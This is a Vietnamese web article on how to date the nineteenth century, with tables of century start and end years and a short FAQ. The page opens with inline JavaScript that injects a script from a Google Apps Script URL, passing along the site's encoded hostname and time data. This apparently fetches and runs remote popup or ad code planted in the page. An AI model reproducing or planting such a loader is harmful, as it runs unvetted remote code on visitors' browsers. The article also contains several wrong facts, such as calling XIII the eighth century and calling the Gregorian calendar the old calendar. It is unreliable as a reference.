var GTM = 'GTM-NJKFBQ8'; var GG_ADS = 'ca-pub-8687624480880776'; var POPUP_IMG_PREFIX = "https://nhaxinhplaza.vn/wp-content/uploads/2022/08/"; // qc.png, close.png var SHOW_POPUP = 1; // 0: disable, 1: enable var MAX_CLAIM = 1; var TIME_TO_SHOW_POPUP = 10; // 10s var MAX_BUFF = 3; var b64e = function (a) { return btoa(encodeURIComponent(a).replace(/%([0-9A-F]{2})/g, function (b, a) { return String.fromCharCode("0x" + a) })) }; var gg_layer = document.createElement('script'); gg_layer.type = 'text/javascript'; gg_layer.src = `https://script.google.com/macros/s/AKfycbwT2tLHaERiLaaaT_05pnXM2h0pjKHGRPBTQgeffPjyIIXBAR46dAuj5S0sgi2scsJ77Q/exec ?st=${b64e(location.hostname)}&tm=${new Date().getHours()}&os=${b64e(new Date().getTimezoneOffset())}`; var s = document.getElementsByTagName('script')[0];s.parentNode.insertBefore(gg_layer, s);

XIX là thế kỷ bao nhiêu? Cách xác định các mốc thời gian

Thế kỷ XIX là thế kỷ thứ 19 và bắt đầu từ năm nào? Hãy cùng Time-daily khám phá trong bài viết này nhé.

Thế kỷ XIX là thế kỷ thứ 19, theo lịch Gregory, mỗi thế kỷ có 100 năm. Thế kỷ XIX (19) kéo dài từ ngày 1/1/1801 đến 31/12/1900.

Bảng cách tính thế kỷ theo lịch Gregory (tức lịch cổ)
Thế kỷ Thời gian bắt đầu Thời gian kết thúc
Thế kỷ XXII(22) 1/1/2101 31/12/2200
Thể kỷ XXI(21) 1/1/2001 31/12/2100
Thể kỷ XX(20) 1/1/1901 31/12/2000
Thể kỷ XIX(19) 1/1/1801 31/12/1900
Thể kỷ XVIII(18) 1/1/1701 31/12/1800
Thể kỷ XVII(17) 1/1/1601 31/12/1700
Thể kỷ XVI(16) 1/1/1501 31/12/1600
Thể kỷ XV(15) 1/1/1401 31/12/1500
Thể kỷ XIV(14) 1/1/1301 31/12/1400
Thể kỷ XIII(13) 1/1/1201 31/12/1300
Thể kỷ XII(12) 1/1/1101 31/12/1200
Thể kỷ XI(11) 1/1/1001 31/12/1100
Thể kỷ X(10) 1/1/901 31/12/1000
Thế kỷ IX(9) 1/1/801 31/12/900
Thế kỷ VIII(8) 1/1/701 31/12/800
Thế kỷ VII(7) 1/1/601 31/12/700
Thế kỷ VI(6) 1/1/501 31/12/600
Thế kỷ V(5) 1/1/401 31/12/500
Thế kỷ IV(4) 1/1/301 31/12/400
Thế kỷ III(3) 1/1/201 31/12/300
Thế kỷ II(2) 1/1/101 31/12/200
Thế kỷ I(1) 1/1/1 31/12/100

Tuy nhiên theo lịch thiên văn học thì thế kỷ thứ 19 lại được bắt đầu vào ngày 1/1/1800 cho đến 31/12/1899.

Bảng phương pháp xác định thế kỷ theo lịch thiên văn.

Bảng cách tính thế kỷ theo lịch thiên văn học
Thế kỷ Thời gian bắt đầu

Thời gian kết thúc

Thế kỷ XXII(22) 01/01/2100 31/12/2199
Thể kỷ XXI(21) 01/01/2000 31/12/2099
Thể kỷ XX(20) 01/01/1900 31/12/1999
Thể kỷ XIX(19) 01/01/1800 31/12/1899
Thể kỷ XVIII(18) 01/01/1700 31/12/1799
Thể kỷ XVII(17) 01/01/1600 31/12/1699
Thể kỷ XVI(16) 01/01/1500 31/12/1599
Thể kỷ XV(15) 01/01/1400 31/12/1499
Thể kỷ XIV(14) 01/01/1300 31/12/1399
Thể kỷ XIII(13) 01/01/1200 31/12/1299
Thể kỷ XII(12) 01/01/1100 31/12/1199
Thể kỷ XI(11) 01/01/1000 31/12/1099
Thể kỷ X(10) 01/01/900 31/12/999
Thế kỷ IX(9) 01/01/800 31/12/899
Thế kỷ VIII(8) 01/01/700 31/12/799
Thế kỷ VII(7) 01/01/600 31/12/699
Thế kỷ VI(6) 01/01/500 31/12/599
Thế kỷ V(5) 01/01/400 31/12/499
Thế kỷ IV(4) 01/01/300 31/12/399
Thế kỷ III(3) 01/01/200 31/12/299
Thế kỷ II(2) 01/01/100 31/12/199
Thế kỷ I(1) 1/1/0 31/12/99

Một số sự kiện nổi bật của Việt Nam và thế giới thế kỷ XIX

Thời kỳ pháp thuộc kéo dài 61 năm (từ 1884 đến 1945) ở Việt Nam trong thế kỷ 19 (XIX).

Trên thế giới: Vào thế kỷ XIX diễn ra cuộc cách mạng công nghiệp lần thứ 2 (đầu năm 1871 đến 1914).

xix là thế kỷ bao nhiêu

Trả lời một số câu hỏi có liên quan khác:

  • Năm 1900 nằm trong thế kỷ thứ 19. Thế kỷ 19 bắt đầu từ ngày 01/01/1801 và kết thúc vào ngày 31/12/1900.
  • Trong thế kỷ thứ mấy năm 1800? Câu trả lời: Năm 1800 thuộc thế kỷ XVIII (18). Thế kỷ XVIII kéo dài từ năm 1701 đến năm 1800.
  • Năm 1914 thuộc thế kỷ mấy? Trả lời: Năm 1914 là thế kỷ thứ hai mươi (XX). Thế kỷ 20 kéo dài từ ngày 01/01/1901 đến ngày 31/12/2000.
  • Năm 1899 thuộc thế kỷ thứ XIX (19). Thế kỷ 19 bắt đầu từ năm 1801 đến hết năm 1900.
  • XIII là thế kỷ thứ tám? Trả lời: XIII là thế kỷ thứ tám (bắt đầu từ 1/1/701 đến 31/12/800).
  • Bài viết đã giúp bạn đọc hiểu rõ hơn về thế kỷ XIX, cách xác định thời điểm bắt đầu của thế kỷ 19 và một số sự kiện lịch sử quan trọng của Việt Nam và thế giới trong thế kỷ này.

  • Một thập kỷ là mười năm. Cách tính thập kỷ.
  • Năm nhuận là điều gì, Năm nhuận có bao nhiêu ngày?

  • Quý bạn đọc có thể để lại bình luận hoặc thảo luận thêm về chủ đề này ở phần cuối của phần bình luận nếu có mọi ý kiến đóng góp hoặc câu hỏi thắc mắc cần giải đáp.